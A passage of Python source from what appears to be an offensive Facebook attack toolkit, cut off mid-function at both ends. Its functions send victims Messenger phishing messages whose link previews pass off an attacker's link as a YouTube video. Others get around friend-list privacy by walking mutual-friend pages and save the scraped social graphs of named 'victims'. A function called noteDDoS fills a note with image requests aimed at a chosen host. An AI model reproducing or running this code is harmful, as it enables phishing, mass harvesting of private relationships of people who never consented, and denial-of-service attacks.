'message_batch[0][message_id]' : '<1394766424499:3126670212-4125121119@mail.projektitan.com>',
'message_batch[0][client_thread_id]' : 'user:'+str(c_user),
'client' : 'web_messenger',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8a9EAMBlCFYwyt2u6aOGeExEW9J6yUgByVbGAF4iGGeqheCu6po',
'__req' : '1n',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '26581658074898653',
'__rev' : '1161243'
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
print 'Ctrl+c SIGNAL Caught\n'
return
def privateMessagePhishing(victimId,message,subject,evilLink,videoLink,title,summary,videoID,hijackedVideo):
c_user = getC_user()
print str(c_user)+'\n'
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'message_batch[0][action_type]' : 'ma-type:user-generated-message',
'message_batch[0][thread_id]' : '',
'message_batch[0][author]' : 'fbid:'+str(c_user),
'message_batch[0][author_email]' : '',
'message_batch[0][coordinates]' : '',
'message_batch[0][timestamp]' : '1410457740680',
'message_batch[0][timestamp_absolute]' : 'Today',
'message_batch[0][timestamp_relative]' : '10:16am',
'message_batch[0][timestamp_time_passed]' : '0',
'message_batch[0][is_unread]' : 'false',
'message_batch[0][is_cleared]' : 'false',
'message_batch[0][is_forward]' : 'false',
'message_batch[0][is_filtered_content]' : 'false',
'message_batch[0][spoof_warning]' : 'false',
'message_batch[0][source]' : 'source:titan:web',
'message_batch[0][body]' : str(message),
'message_batch[0][has_attachment]' : 'true',
'message_batch[0][html_body]' : 'false',
'message_batch[0][specific_to_list][0]' : 'fbid:'+str(victimId),
'message_batch[0][specific_to_list][1]' : 'fbid:'+str(c_user),
'message_batch[0][content_attachment][subject]' : str(subject),
'message_batch[0][content_attachment][app_id]' : '2309869772',
'message_batch[0][content_attachment][attachment][params][urlInfo][canonical]' : str(videoLink),
'message_batch[0][content_attachment][attachment][params][urlInfo][final]' : str(videoLink),
'message_batch[0][content_attachment][attachment][params][urlInfo][user]' : str(evilLink),
'message_batch[0][content_attachment][attachment][params][urlInfo][log][1408344793]' : 'https://www.mkit.com.ar/',
'message_batch[0][content_attachment][attachment][params][favicon]' : 'http://s.ytimg.com/yts/img/favicon_32-vflWoMFGx.png',
'message_batch[0][content_attachment][attachment][params][title]' : str(title),
'message_batch[0][content_attachment][attachment][params][summary]' : str(summary),
'message_batch[0][content_attachment][attachment][params][images][0]' : 'http://i1.ytimg.com/vi/'+videoID+'/mqdefault.jpg?feature=og&cfs=1&upscale',
'message_batch[0][content_attachment][attachment][params][medium]' : '103',
'message_batch[0][content_attachment][attachment][params][url]' : str(videoLink),
'message_batch[0][content_attachment][attachment][params][video][0][type]' : 'application/x-shockwave-flash',
'message_batch[0][content_attachment][attachment][params][video][0][src]' : 'http://www.youtube.com/v/'+str(hijackedVideo)+'?version=3&autohide=1&autoplay=1',
'message_batch[0][content_attachment][attachment][params][video][0][width]' : '1280',
'message_batch[0][content_attachment][attachment][params][video][0][height]' : '720',
'message_batch[0][content_attachment][attachment][params][video][0][secure_url]' : 'https://www.youtube.com/v/'+str(hijackedVideo)+'?version=3&autohide=1&autoplay=1',
'message_batch[0][content_attachment][attachment][type]' : '100',
'message_batch[0][content_attachment][link_metrics][source]' : 'ShareStageExternal',
'message_batch[0][content_attachment][link_metrics][domain]' : 'www.youtube.com',
'message_batch[0][content_attachment][link_metrics][base_domain]' : 'youtube.com',
'message_batch[0][content_attachment][link_metrics][title_len]' : str(len(title)),
'message_batch[0][content_attachment][link_metrics][summary_len]' : str(len(summary)),
'message_batch[0][content_attachment][link_metrics][min_dimensions][0]' : '70',
'message_batch[0][content_attachment][link_metrics][min_dimensions][1]' : '70',
'message_batch[0][content_attachment][link_metrics][images_with_dimensions]' : '1',
'message_batch[0][content_attachment][link_metrics][images_pending]' : '0',
'message_batch[0][content_attachment][link_metrics][images_fetched]' : '0',
'message_batch[0][content_attachment][link_metrics][image_dimensions][0]' : '1280',
'message_batch[0][content_attachment][link_metrics][image_dimensions][1]' : '720',
'message_batch[0][content_attachment][link_metrics][images_selected]' : '1',
'message_batch[0][content_attachment][link_metrics][images_considered]' : '1',
'message_batch[0][content_attachment][link_metrics][images_cap]' : '10',
'message_batch[0][content_attachment][link_metrics][images_type]' : 'images_array',
'message_batch[0][content_attachment][composer_metrics][best_image_w]' : '100',
'message_batch[0][content_attachment][composer_metrics][best_image_h]' : '100',
'message_batch[0][content_attachment][composer_metrics][image_selected]' : '0',
'message_batch[0][content_attachment][composer_metrics][images_provided]' : '1',
'message_batch[0][content_attachment][composer_metrics][images_loaded]' : '1',
'message_batch[0][content_attachment][composer_metrics][images_shown]' : '1',
'message_batch[0][content_attachment][composer_metrics][load_duration]' : '2',
'message_batch[0][content_attachment][composer_metrics][timed_out]' : '0',
'message_batch[0][content_attachment][composer_metrics][sort_order]' : '',
'message_batch[0][content_attachment][composer_metrics][selector_type]' : 'UIThumbPager_6',
'message_batch[0][force_sms]' : 'true',
'message_batch[0][ui_push_phase]' : 'V3',
'message_batch[0][status]' : '0',
'message_batch[0][message_id]' : '<1410457740680:1367750931-713286099@mail.projektitan.com>',
'message_batch[0][client_thread_id]' : 'user:'+str(victimId),
'client' : 'web_messenger',
'__user' : str(c_user),
'__a' : '1',
'__dyn' : '7n8ahyj35CCOadgDxqjdLg',
'__req' : 'c',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '265816977807275100848411568',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php ',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
print 'Ctrl+c SIGNAL Caught\n'
return
def linkFriends(victim):
friends = []
root = 'dumps'
directory = victim
delay = 1
linkedFile = open( os.path.join(root,directory,victim+"friend_links.html"),"wb")
try:
persons = open( os.path.join(root,directory,victim+".txt") ,"rb")
except:
print '\r \r',
print '\r %s.txt not exists, error on linkFriends module \r' %victim,
logs(str(victim)+' not exists, error on linkFriends module')
return
while True:
linea = persons.readline()
if not linea:
break
friends.append(linea.strip("\n\r"))
persons.close()
for individuals in friends:
try:
response = br.open('https://graph.facebook.com/'+individuals)
resultado = response.read()
json_dump = json.loads(resultado)
try:
friend = json_dump['link']+' '+json_dump['name']+' '+json_dump['gender']+ ' '+ json_dump['locale']
print friend
linkedFile.write(MyParser.htmlFormat(json_dump))
except:
try:
print 'https://www.facebook.com/%s' %json_dump['username']+' '+json_dump['name']+' '+json_dump['gender']+ ' '+ json_dump['locale']
except:
print 'https://www.facebook.com/%s' %individuals
except mechanize.HTTPError as e:
print e.code
print 'Sleeping %d' %delay
sleep(delay)
delay += 1
except mechanize.URLError as e:
print e.reason.args
print 'Sleeping %d URLerror ' %delay
sleep(delay)
delay += 1
linkedFile.close()
def getName(userId):
try:
response = br.open('https://www.facebook.com/'+str(userId))
data = response.read()
match = re.search("_8_2",data)
if match is not None:
start = match.end() + 33
matchBis = re.search('">',data[start:])
if matchBis is not None:
return data[start:start+matchBis.start()]
return userId
except mechanize.HTTPError as e:
print str(e.code)
return userId
except mechanize.URLError as e:
print str(e.reason.args)
return userId
except:
return userId
def mkdir(directory,root):
import os
if os.path.exists(os.path.join(root,directory)):
return
else:
os.makedirs(os.path.join(root,directory))
def saveObjects(victim,matrix,ref):
path = os.path.join("dumps",victim,"objects",victim)
f = open(path,"wb")
pickle.dump(matrix,f)
g = open(path+'.ref',"wb")
pickle.dump(ref,g)
g.close()
f.close()
def loadObjects(victim):
try:
path = os.path.join("dumps",victim,"objects",victim)
f = open(path,"rb")
A = pickle.load(f)
g = open( path +'.ref',"rb")
ref = pickle.load(g)
g.close()
f.close()
return A,ref
except:
return [],{}
def reAnalyzeGraph(victim):
try:
f = open( os.path.join("dumps",victim,"objects",victim+"-community" ) ,"rb")
labelGraph = pickle.load(f)
f.close()
except:
logs('Error on reAnalyzeGraph() object not exist')
print 'Error on reAnalyzeGraph() object not exist\n'
return
#Community algorithm
root = 'dumps'
directory = victim
try:
partition = community.best_partition(labelGraph)
for i in set(partition.values()):
print "Community", i
members = [nodes for nodes in partition.keys() if partition[nodes] == i]
egonet = labelGraph.subgraph(set(members))
print sorted(egonet.nodes(),reverse=False)
print sorted(egonet.edges(),reverse=False)
nx.draw_spring(egonet,node_color = np.linspace(0,1,len(egonet.nodes())),edge_color = '#000000' ,with_labels=True)
plt.savefig( os.path.join(root,directory,victim+"Community"+str(i)+".pdf") )
plt.savefig( os.path.join(root,directory,victim+"Community"+str(i)+".png") )
write_dot(egonet, os.path.join(root,directory,victim+"Community"+str(i)+".dot") )
plt.show()
raw_input('Press enter to continue...\n')
except:
logs('Error on reAnalyzeGraph() debbug for more information')
print 'Error on reAnalyzeGraph() debbug for more information\n'
return
def analyzeGraph(victim):
root = 'dumps'
directory = victim
mkdir(directory,root)
edges = {}
edgesValues = {}
nodekeys = {}
userNames = []
commonPages = {}
A,idkeys = loadObjects(victim)
if A != []:
myGraph = nx.from_numpy_matrix(A)
nodes = myGraph.nodes()
#Percentage
i = 0.0
percentage = 0.0
#flush
print '\r \r',
#Dictio creation of usernames
#Associated with node number
print 'Attemping to get user\'s information'
for elements in idkeys.keys():
try:
user = getName(elements)
commonPages[user] = corePagesLike(victim,elements)
userNames.append(user)
nodekeys[idkeys[elements]] = user
percentage = (i * 100.0)/len(idkeys.keys())
flush()
print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(idkeys.keys()), percentage),
i+=1
except:
continue
reference = open( os.path.join(root,directory,victim+"references.txt") ,"wb")
for users in nodekeys.keys():
try:
line = str(nodekeys[users])+' : '+str(users)
reference.write(line + '\n')
except:
continue
reference.close()
for node in nodes:
try:
edges[node] = myGraph.degree(node)
if edgesValues.has_key(edges[node]):
edgesValues[edges[node]].append(node)
else:
edgesValues[edges[node]] = [node]
except:
continue
for values in sorted(edgesValues.keys(),reverse=True):
try:
print str(values) + ' aristas; nodos: ',
for nodes in edgesValues[values]:
print str(nodes) + ', ',
print '\n'
except:
continue
print nx.is_connected(myGraph)
print nx.number_connected_components(myGraph)
ccs = nx.clustering(myGraph)
print ccs
print sum(ccs)/len(ccs)
#Creation of the labeld graph for community
labelNodes = myGraph.nodes()
labelEdges = myGraph.edges()
labelGraph = nx.Graph()
for label in labelNodes:
try:
labelGraph.add_node(nodekeys[int(label)],likes=commonPages[nodekeys[int(label)]])
except:
continue
for labelE in labelEdges:
try:
labelGraph.add_edge(nodekeys[int(labelE[0])],nodekeys[int(labelE[1])])
except:
continue
try:
nx.draw_spring(labelGraph,node_color = np.linspace(0,1,len(labelGraph.nodes())),edge_color = np.linspace(0,1,len(labelGraph.edges())) ,with_labels=True)
plt.savefig( os.path.join(root,directory,victim+"labelGraph_color.pdf") )
plt.savefig( os.path.join(root,directory,victim+"labelGraph_color.png") )
write_dot(labelGraph, os.path.join(root,directory,victim+"labelGraph_color.dot") )
plt.show()
except:
print 'Erro plotting the graph'
#Saving the object for future analysis
f = open( os.path.join("dumps",victim,"objects",victim+"-community") ,"wb")
pickle.dump(labelGraph,f)
f.close()
#Community algorithm
partition = community.best_partition(labelGraph)
for i in set(partition.values()):
try:
print "Community", i
members = [nodes for nodes in partition.keys() if partition[nodes] == i]
except:
continue
''' No longer necessary (?)
reference = open(root+"\\"+directory+"\\community"+str(i)+"references.txt","wb")
for nodes in members:
line = str(nodekeys[int(nodes)])+' : '+str(nodes)
reference.write(line + '\n')
reference.close()
'''
try:
egonet = labelGraph.subgraph(set(members))
print sorted(egonet.nodes(),reverse=False)
print sorted(egonet.edges(),reverse=False)
nx.draw_spring(egonet,node_color = np.linspace(0,1,len(egonet.nodes())),edge_color = '#000000' ,with_labels=True)
plt.savefig( os.path.join(root,directory,victim+"Community"+str(i)+".pdf") )
plt.savefig( os.path.join(root,directory,victim+"Community"+str(i)+".png") )
write_dot(egonet, os.path.join(root,directory,victim+"Community"+str(i)+".dot") )
plt.show()
except:
print 'Error plotting the graph'
raw_input('Press enter to continue...\n')
else:
logs('Error on analyzeGraph() file not exist')
print 'Error on analyzeGraph() file not exist\n'
return
def bypassFriendshipPrivacyPlot(victim, transitive):
coleccion = {}
nodeID = 0
root = 'dumps'
directory = str(victim)
mkdir(directory,root)
myGraph = nx.Graph()
coleccion[victim] = nodeID
victima = nodeID
myGraph.add_node(victima)
nodeID += 1
#Percentage container
percentage = 0.0
#Disclosude friends container
friendships = []
#Already visited nodes container
visited = []
try:
#If the file already exists
friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"rb")
#Reads every line of the file
while True:
linea = friendshipFile.readline()
if not linea:
break
#Store in the visited array for non repetition
visited.append(linea.strip("\n\r"))
friendshipFile.close()
A,coleccion = loadObjects(victim)
if A == []:
logs("Inconsistency, the userid file exists, but has no object associated")
print "Inconsistency, the userid file exists, but has no object associated"
return
else:
myGraph = nx.from_numpy_matrix(A)
except:
#If the file does not exists, creates the file
friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"wb")
friendshipFile.close()
try:
#Generates the first level of the search
result = coreFriendshipPrivacy(victim,transitive)
except:
print 'Check the internet connection please..'
return
#Stores non repetitive values in the disclosed friends container
for individuos in result:
if individuos not in visited:
if coleccion.has_key(individuos) == False:
nodo = nodeID
nodeID += 1
coleccion[individuos] = nodo
else:
nodo = coleccion[individuos]
if coleccion.has_key(transitive) == False:
transitivo = nodeID
nodeID += 1
coleccion[transitive] = transitivo
else:
transitivo = coleccion[transitive]
myGraph.add_node(nodo)
myGraph.add_edge(nodo,transitivo)
friendships.append(individuos)
#Counter for percentage calculus purpose
i = 0.0
#flush
print '\r \r',
#For every value in the first disclosed list, repeats until every value has been tryed
for friends in friendships:
#Percentage calculus
percentage = (i * 100.0)/len(friendships)
flush()
print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(friendships), percentage),
i+=1
#Only if the node wasn't visited
if friends not in visited:
#if coreFriendshipPrivacy() fails, an exception is caught. Therefore, state wis still being True.
#Only if the try passes, the infinite while will end. (For internet error connection problem)
state = True
while state == True:
try:
result = coreFriendshipPrivacy(victim,friends)
state = False
except signalCaught as e:
state = False
print 'Signal Caught handler'
print '%s ' %e.args[0]
return
except:
logs('Check the internet connection please.. Press enter when it\'s done')
print '\r \r',
raw_input('\rCheck the internet connection please.. Press enter when it\'s done\r'),
#Stores non repetitive values in the disclosed friends container
for element in result:
if element not in friendships:
if coleccion.has_key(friends) == False:
nodo = nodeID
nodeID += 1
coleccion[friends] = nodo
else:
nodo = coleccion[friends]
if coleccion.has_key(element) == False:
transitivo = nodeID
nodeID += 1
coleccion[element] = transitivo
else:
transitivo = coleccion[element]
myGraph.add_node(nodo)
myGraph.add_edge(nodo,transitivo)
friendships.append(element)
#Stores every single value of friendships list alredy analyzed for non repetitivness
visited.append(friends)
#Check if the file exists, if true append, else create and writes
try:
friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"ab")
except:
friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"wb")
#Stores every userID for further analyzis
for friends in friendships:
if coleccion.has_key(friends) == False:
transitivo = nodeID
nodeID += 1
coleccion[friends] = transitivo
else:
transitivo = coleccion[friends]
myGraph.add_edge(victima,transitivo)
friendshipFile.write(str(friends)+'\n')
friendshipFile.close()
mkdir('objects', os.path.join(root,directory))
A = nx.adj_matrix(myGraph)
saveObjects(victim, A, coleccion)
nx.draw_spring(myGraph,node_color = np.linspace(0,1,len(myGraph.nodes())),edge_color = np.linspace(0,1,len(myGraph.edges())) ,with_labels=True)
plt.savefig( os.path.join(root,directory,victim+"graph_color.pdf") )
plt.savefig( os.path.join(root,directory,victim+"graph_color.png") )
write_dot(myGraph,os.path.join(root,directory,victim+"graph_color.dot"))
plt.show()
def bypassFriendshipPrivacy(victim, transitive):
#Percentage container
percentage = 0.0
#Disclosude friends container
friendships = []
#Already visited nodes container
visited = []
try:
#If the file already exists
friendshipFile = open( os.path.join("dumps",victim+".txt") ,"rb")
#Reads every line of the file
while True:
linea = friendshipFile.readline()
if not linea:
break
#Store in the visited array for non repetition
visited.append(linea.strip("\n\r"))
friendshipFile.close()
except:
#If the file does not exists, creates the file
friendshipFile = open( os.path.join("dumps",victim+".txt") ,"wb")
friendshipFile.close()
try:
#Generates the first level of the search
result = coreFriendshipPrivacy(victim,transitive)
except:
print '\r \r',
raw_input('\rCheck the internet connection please.. Press enter when it\'s done\r'),
return
#Stores non repetitive values in the disclosed friends container
for individuos in result:
if individuos not in visited:
friendships.append(individuos)
#Counter for percentage calculus purpose
i = 0.0
#flush
print '\r \r',
#For every value in the first disclosed list, repeats until every value has been tryed
for friends in friendships:
#Percentage calculus
percentage = (i * 100.0)/len(friendships)
flush()
print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(friendships), percentage),
i+=1
#Only if the node wasn't visited
if friends not in visited:
#if coreFriendshipPrivacy() fails, an exception is caught. Therefore, state wis still being True.
#Only if the try passes, the infinite while will end. (For internet error connection problem)
state = True
while state == True:
try:
result = coreFriendshipPrivacy(victim,friends)
state = False
except signalCaught as e:
state = False
print 'Signal Caught handler'
print '%s ' %e.args[0]
return
except:
print '\r \r',
raw_input('\rCheck the internet connection please..\r'),
#Stores non repetitive values in the disclosed friends container
for element in result:
if element not in friendships:
friendships.append(element)
#Stores every single value of friendships list alredy analyzed for non repetitivness
visited.append(friends)
#Check if the file exists, if true append, else create and writes
try:
friendshipFile = open( os.path.join("dumps",victim+".txt") ,"ab")
except:
friendshipFile = open( os.path.join("dumps",victim+".txt") ,"wb")
#Stores every userID for further analyzis
for friends in friendships:
friendshipFile.write(str(friends)+'\n')
friendshipFile.close()
def corePagesLike(victim,transitive):
matchs = []
begin = 0
page = []
try:
response = br.open('https://www.facebook.com/'+str(victim)+'?and='+str(transitive)+'&sk=favorites')
resultado = response.read()
match = re.search('timelineFriendsColumnHeader',resultado)
if match is not None:
linea = re.search('timelineFriendsColumnHeader(.+)',resultado).group()
except mechanize.HTTPError as e:
print e.code
#Should handle a custom error
raise
except mechanize.URLError as e:
print e.reason.args
#Should handle a custom error
raise
#Error connection the upper function will catch the exception
except:
raise
while True:
match = re.search('fbStreamTimelineFavInfoContainer',resultado[begin:])
if match != None:
matchEnd = re.search('\n',resultado[begin+match.start():])
if matchEnd != None:
matchs.append(resultado[begin+match.start():matchEnd.end()+begin+match.start()])
begin = matchEnd.end()+begin+match.start()
match = None
matchEnd = None
else:
break
for linea in matchs:
start = 0
try:
#Search the string to get the position of the starting match
matchAnd = re.search('page\.php\?id=',linea[start:])
#Search the end of the match for taking the id length
matchEnd = re.search('">',linea[start+matchAnd.end():])
#If we have a start and an end, we have the id value
except:
print 'ERROR'
if (matchAnd and matchEnd) is not None:
#Appends the value given the proper position (resolved a few lines up)
page.append(linea[start+matchAnd.end():start+matchEnd.start()+matchAnd.end() ])
#Moves the pointer for next match
start += matchEnd.start()+matchAnd.end()
return page
def checkPrivacy(victim):
try:
response = br.open('https://www.facebook.com/'+str(victim)+'?sk=friends')
resultado = response.read()
match = re.search('All Friends',resultado)
matchBis = re.search('Todos los amigos',resultado)
matchBisBis = re.search('Todos mis amigos',resultado)
if ((match is not None) or (matchBis is not None) or (matchBisBis is not None)):
matchFriends = re.search('_1qp6(.+)"',resultado).group()
return matchFriends
else:
return -1
except:
print 'Error in the process, brute force will be applied ..'
return -1
def simpleGraph(friends, victim):
coleccion = {}
nodeID = 0
root = 'dumps'
directory = str(victim)
mkdir(directory,root)
myGraph = nx.Graph()
coleccion[victim] = nodeID
victima = nodeID
myGraph.add_node(victima)
nodeID += 1
#Check if the file exists, if true append, else create and writes
try:
friendshipFile = open( os.path.join(root,directory,victim+".txt"),"ab")
except:
friendshipFile = open( os.path.join(root,directory,victim+".txt"),"wb")
for friend in friends:
friendshipFile.write(str(friend)+'\n')
try:
mutual = coreFriendshipPrivacy(victim, friend)
except:
continue
coleccion[friend] = nodeID
nodeID += 1
if myGraph.has_node(friend) != True:
myGraph.add_node(friend)
if myGraph.has_edge(victima, friend) != True:
myGraph.add_edge(victima, friend)
for element in mutual:
if myGraph.has_node(element) != True:
myGraph.add_node(element)
myGraph.add_edge(element, friend)
friendshipFile.close()
mkdir('objects', os.path.join(root,directory))
A = nx.adj_matrix(myGraph)
saveObjects(victim, A, coleccion)
nx.draw_spring(myGraph,node_color = np.linspace(0,1,len(myGraph.nodes())),edge_color = np.linspace(0,1,len(myGraph.edges())) ,with_labels=True)
plt.savefig( os.path.join(root,directory,victim+"graph_color.pdf") )
plt.savefig( os.path.join(root,directory,victim+"graph_color.png") )
write_dot(myGraph,os.path.join(root,directory,victim+"graph_color.dot"))
plt.show()
def friendshipPlot(text,victim):
friends = []
friendsID = []
counter = 0
lastId = 0
count = 0
while counter < 4:
matchStart = re.search("_5q6s _8o _8t lfloat _ohe\" href=\"https://www.facebook.com/",text)
if matchStart is not None:
start = matchStart.end()
matchEnd = re.search("\?",text[start:])
name = text[start:matchEnd.start()+start]
if (name not in friends) and (name != "profile.php"):
friends.append(name)
fbid = getUserID(name)
if fbid is not -1:
friendsID.append(fbid)
count += 1
flush()
print "\rFriends enumerated: %d" %count,
text = text[matchEnd.start()+start:]
else:
try:
c_user = getC_user()
userId = getUserID(victim)
if getUserID(friends[len(friends)-1]) == lastId:
counter += 1
lastId = getUserID(friends[len(friends)-1])
encoded = b64encode('0:not_structured:'+str(lastId))
response = br.open('https://www.facebook.com/ajax/pagelet/generic.php/AllFriendsAppCollectionPagelet?data={"collection_token":"'+userId+':2356318349:2","cursor":"'+encoded+'","tab_key":"friends","profile_id":'+userId+',"q":"'+victim+'","overview":false,"ftid":null,"order":null,"sk":"friends","importer_state":null}&__user='+c_user+'&__a=1&__dyn=7n8apij2qmp5zpQ9UoHbgWyxi9ACwKyaF299qzCAjFDxCm&__req=7&__rev=1183274')
to_parse = str(response.read()).strip('for (;;);')
try:
#Converts the json web response to a python like object
json_dump = json.loads(to_parse)
text = json_dump["payload"]
except:
print 'Error on json loading'
except:
print 'ERROR MOTHER FUCKER'
return friendsID, friends
def coreFriendshipPrivacy(victim,transitive):
friends = []
try:
response = br.open('https://www.facebook.com/'+str(victim)+'?and='+str(transitive)+'&sk=friends')
resultado = response.read()
match = re.search('timelineFriendsColumnHeader',resultado)
if match is not None:
linea = re.search('timelineFriendsColumnHeader(.+)',resultado).group()
except mechanize.HTTPError as e:
print e.code
#Should handle a custom error
raise
except mechanize.URLError as e:
print e.reason.args
#Should handle a custom error
raise
#Error connection the upper function will catch the exception
except:
raise
#Offset for the string search
start = 0
#While line matches the searched values
while True:
try:
#Search the string to get the position of the starting match
matchAnd = re.search('user\.php\?id=',linea[start:])
#Search the end of the match for taking the id length
matchEnd = re.search('&',linea[start+matchAnd.end():])
#If we have a start and an end, we have the id value
if (matchAnd and matchEnd) is not None:
#Appends the value given the proper position (resolved a few lines up)
toUserID = linea[start+matchAnd.end():start+matchEnd.start()+matchAnd.end()]
if toUserID not in friends:
friends.append(toUserID)
#Moves the pointer for next match
start += matchEnd.start()+matchAnd.end()
#If the match ends (Equals of end of the line for the search)
except:
#Search for more friends (Ajax controled)
match = re.search('/ajax/browser/list/mutualfriends/',resultado)
if match is not None:
#Call for the extendend friend search module
extend = seeMore(len(friends),victim,transitive)
#Return the merge of the lists
return list(set(extend + friends))
else:
#In case there are no more friends, returns the original list
return friends
def seeMore(start,victim,transitive):
#vitimId and transitiveId needs to be IDS, instead of usernames. Is like a cast from the username to the Id
#doesn't matter if the given argument is already the id.
victimId = getUserID(victim)
transitiveId = getUserID(transitive)
#Disclosed friends container
extendedFriends = []
if (victimId == -1) or (transitiveId == -1):
return extendedFriends
#While there friends to disclosed in the particular union set
while True:
try:
response = br.open('https://www.facebook.com/ajax/browser/list/mutualfriends/?uid='+str(transitiveId)+'&view=grid&location=other&infinitescroll=0&short=1&node='+str(victimId)+'&start='+str(start)+'&__user='+str(getC_user())+'&__a=1&__dyn=7n8ahyj35zolgDxqihXzA&__req=6')
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
raise
#Strips the web response for further processes
to_parse = str(response.read()).strip('for (;;);')
try:
#Converts the json web response to a python like object
json_dump = json.loads(to_parse)
except:
print 'Error on json loading'
#For non-blocking excecution - The upper function is excpecting a list to be returned
return extendedFriends
#Offset represents the start offset for non-repetition purpose
offset = 0
#Controls the end of the module excecution
NoneFlag = True
#Search for friends to be added
for element in range(len(json_dump['jsmods']['require'])):
if json_dump['jsmods']['require'][element][0] == unicode('AddFriendButton'):
NoneFlag = False
offset += 1
extendedFriends.append(json_dump['jsmods']['require'][element][3][1])
#If no friend was added, the excecution ends
if NoneFlag:
break
#Increments offset from the start in the search
start += offset
#End of the while, returns the new list
return extendedFriends
def getUserID(user):
#Grabs the user Id using the OpenGraph
try:
response = br.open('https://www.facebook.com/'+str(user))
data = response.read()
#json_dump = json.loads(resultado)
#try:
# return json_dump['id']
#except:
# return -1
except mechanize.HTTPError as e:
print e.code
return -1
except mechanize.URLError as e:
print e.reason.args
return -1
try:
match = re.search("fb://profile/",data)
if match is not None:
start = match.end()
matchBis = re.search('"',data[start:])
if matchBis is not None:
return data[start:start+matchBis.start()]
except:
return user
def logs(messagelog):
logging.basicConfig(filename=os.path.join("logs","error.log"), level=logging.NOTSET, format='')
cTime = ctime(time())
log = str(cTime) + ' : ' + str(messagelog)
logging.debug(log)
def dotFile(victim, transitive):
root = 'dumps'
directory = str(victim)
mkdir(directory,root)
myGraph = open( os.path.join(root,directory,victim+"_dot.dot") ,"wb")
myGraph.write('Graph {\n')
#Percentage container
percentage = 0.0
#Disclosude friends container
friendships = []
#Already visited nodes container
visited = []
try:
#If the file already exists
friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"rb")
#Reads every line of the file
while True:
linea = friendshipFile.readline()
if not linea:
break
#Store in the visited array for non repetition
visited.append(linea.strip("\n\r"))
friendshipFile.close()
except:
#If the file does not exists, creates the file
friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"wb")
friendshipFile.close()
try:
#Generates the first level of the search
result = coreFriendshipPrivacy(victim,transitive)
except:
print 'Check the internet connection please..'
return
#Stores non repetitive values in the disclosed friends container
transitivo = getName(transitive)
for individuos in result:
if individuos not in visited:
chabon = getName(individuos)
myGraph.write(' "'+transitivo + '" -> "' + chabon + '";\n')
friendships.append(individuos)
visited.append(getUserID(transitive))
#Counter for percentage calculus purpose
i = 0.0
#flush
print '\r \r',
#For every value in the first disclosed list, repeats until every value has been tried
for friends in friendships:
#Percentage calculus
percentage = (i * 100.0)/len(friendships)
flush()
print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(friendships), percentage),
i+=1
#Only if the node wasn't visited
if friends not in visited:
#if coreFriendshipPrivacy() fails, an exception is caught. Therefore, state will still be True.
#Only if the try passes, the infinite while will end. (For internet error connection problem)
state = True
while state == True:
try:
result = coreFriendshipPrivacy(victim,friends)
state = False
except signalCaught as e:
state = False
print 'Signal Caught handler'
print '%s ' %e.args[0]
return
except:
logs('Check the internet connection please.. Press enter when it\'s done')
print '\r \r',
a = raw_input('\rCheck the internet connection please.. Press enter when it\'s done\r')
if a == 1:
state = False
else:
if a == 2:
email,password = setMail()
login(email,password,'real')
#Stores non repetitive values in the disclosed friends container
friendName = getName(friends)
for element in result:
if element not in friendships:
transitive = getName(element)
myGraph.write(' "'+friendName + '" -> "' + transitive + '";\n')
friendships.append(element)
#Stores every single value of friendships list already analysed for non repetitiveness
visited.append(friends)
#Check if the file exists, if true append, else create and writes
try:
friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"ab")
except:
friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"wb")
#Stores every userID for further analysis
for friends in friendships:
transitivo = getName(friends)
myGraph.write(' "'+victim + '" -> "' + transitivo + '";\n')
friendshipFile.write(str(friends)+'\n')
myGraph.write('}')
friendshipFile.close()
myGraph.close()
def simpleDotGraph(friends, victim):
root = 'dumps'
directory = str(victim)
mkdir(directory,root)
myGraph = open( os.path.join(root,directory,victim+"_dot.dot"),"wb")
myGraph.write('Graph {\n')
friendshipFile = open( os.path.join(root,directory,victim+".txt"),"wb")
for friend in friends:
friendshipFile.write(str(friend)+'\n')
friendshipFile.close()
for friend in friends:
try:
mutual = coreFriendshipPrivacy(victim, friend)
except:
continue
transitive = getName(friend)
myGraph.write(' "'+victim + '" -> "' + transitive + '";\n')
for element in mutual:
mutualFriend = getName(element)
myGraph.write(' "'+transitive + '" -> "' + mutualFriend + '";\n')
myGraph.write('}')
myGraph.close()
def noteDDoS(imageURL,noteID, privacy):
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
j = int(raw_input('starting parameter number? (img.jpg?file=number) : '))
amount = int(raw_input('last parameter number? (img.jpg?file=number) : '))
title = raw_input('Note title: ')
content = '<p>' + raw_input('Note preview text: ') + '</p>'
for i in range(j,int(amount)):
content += '<p><img src="'+imageURL+'?file='+str(i)+'"></img></p>'
arguments = {
'fb_dtsg' : fb_dtsg,
'object_id' : noteID,
'note_id' : noteID,
'id' : getC_user(),
'title' : title,
'note_content' : content,
'audience['+noteID+'][value]' : privacy,
'publish' : 'Publish',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : '7n8ahyj34fzpQ9UoHaEWy1m9ACwKyaF3pqzCAjFDxCm6qyE',
'__req' : '7',
'ttstamp' : '2658169897154120115496511690',
'__rev' : '1224624'
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/ajax/notes/edit',datos)
